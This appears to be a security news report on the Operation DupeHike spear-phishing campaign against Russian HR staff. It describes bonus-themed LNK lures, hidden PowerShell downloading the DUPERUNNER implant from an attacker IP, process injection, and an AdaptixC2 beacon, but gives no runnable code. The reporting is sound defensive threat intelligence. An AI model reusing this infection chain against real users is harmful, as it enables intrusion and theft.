A sophisticated attack campaign known as Operation DupeHike has emerged as a significant threat to Russian corporate environments, specifically targeting employees within human resources, payroll, and administrative departments.
The campaign, attributed to the threat group UNG0902, leverages carefully crafted decoy documents themed around employee bonuses and internal financial policies to deliver a previously unknown malware ecosystem to victims’ machines.
The attack begins with spear-phishing emails containing ZIP archives disguised as legitimate corporate documents.
These archives are named “Премия 2025.zip” (Bonus.Zip in English) and contain malicious shortcut files (.LNK) that appear to be PDF documents, using filenames like “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk” to deceive recipients into opening them.
Seqrite security analysts identified this campaign after discovering a malicious ZIP archive on VirusTotal on November 21, 2025.
The research team noted that the threat actor demonstrates sophisticated understanding of Russian corporate HR workflows, crafting decoy documents that outline realistic bonus structures tied to performance metrics, KPIs, and organizational goals.
The lure document references Russia’s Labor Code and establishes a default bonus rate of fifteen percent of annual salary, creating convincing social engineering material for targeting employees in financial departments.
Infection Mechanism and Technical Breakdown
The attack chain operates through three distinct stages, beginning with malicious LNK execution. When a victim opens the shortcut file, PowerShell executes hidden in the background using specific flags: NoNI, nop, and w hidden parameters.
.webp "Operation DupeHike Attacking Employees Using Weaponized Documents DUPERUNNER Malware 3")
The script uses Invoke-WebRequest to download a second-stage implant called DUPERUNNER from the attacker-controlled server at 46.149.71.230.
DUPERUNNER, a C++ compiled implant, performs critical reconnaissance and injection operations. The malware contains multiple functions designed for maintaining persistence and evading detection.
It enumerates target processes including explorer.exe, notepad.exe, and msedge.exe for injection purposes while simultaneously downloading decoy PDFs to display to users, creating the illusion of legitimate document processing.
The implant then performs remote thread injection to load the final payload: an AdaptixC2 beacon. This command-and-control beacon uses HTTP POST requests to communicate with attacker infrastructure, enabling remote command execution and data exfiltration capabilities.
The beacon employs dynamic API resolution using djb2-style hashing to avoid static detection signatures.
.webp "Operation DupeHike Attacking Employees Using Weaponized Documents DUPERUNNER Malware 4"){kind=tracking}
Seqrite researchers extracted configuration artifacts revealing the beacon identification numbers and command-and-control infrastructure hosted on servers under ASN 48282 and AS 9123, operated by VDSINA-AS and TIMEWEB-AS.
The infrastructure demonstrates port configuration changes from port 80 during implant delivery to port 443 for final beacon operations, indicating ongoing refinement of attack infrastructure.
This campaign represents an evolving threat landscape where sophisticated social engineering combines with advanced malware capabilities to target corporate environments in Eastern Europe.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
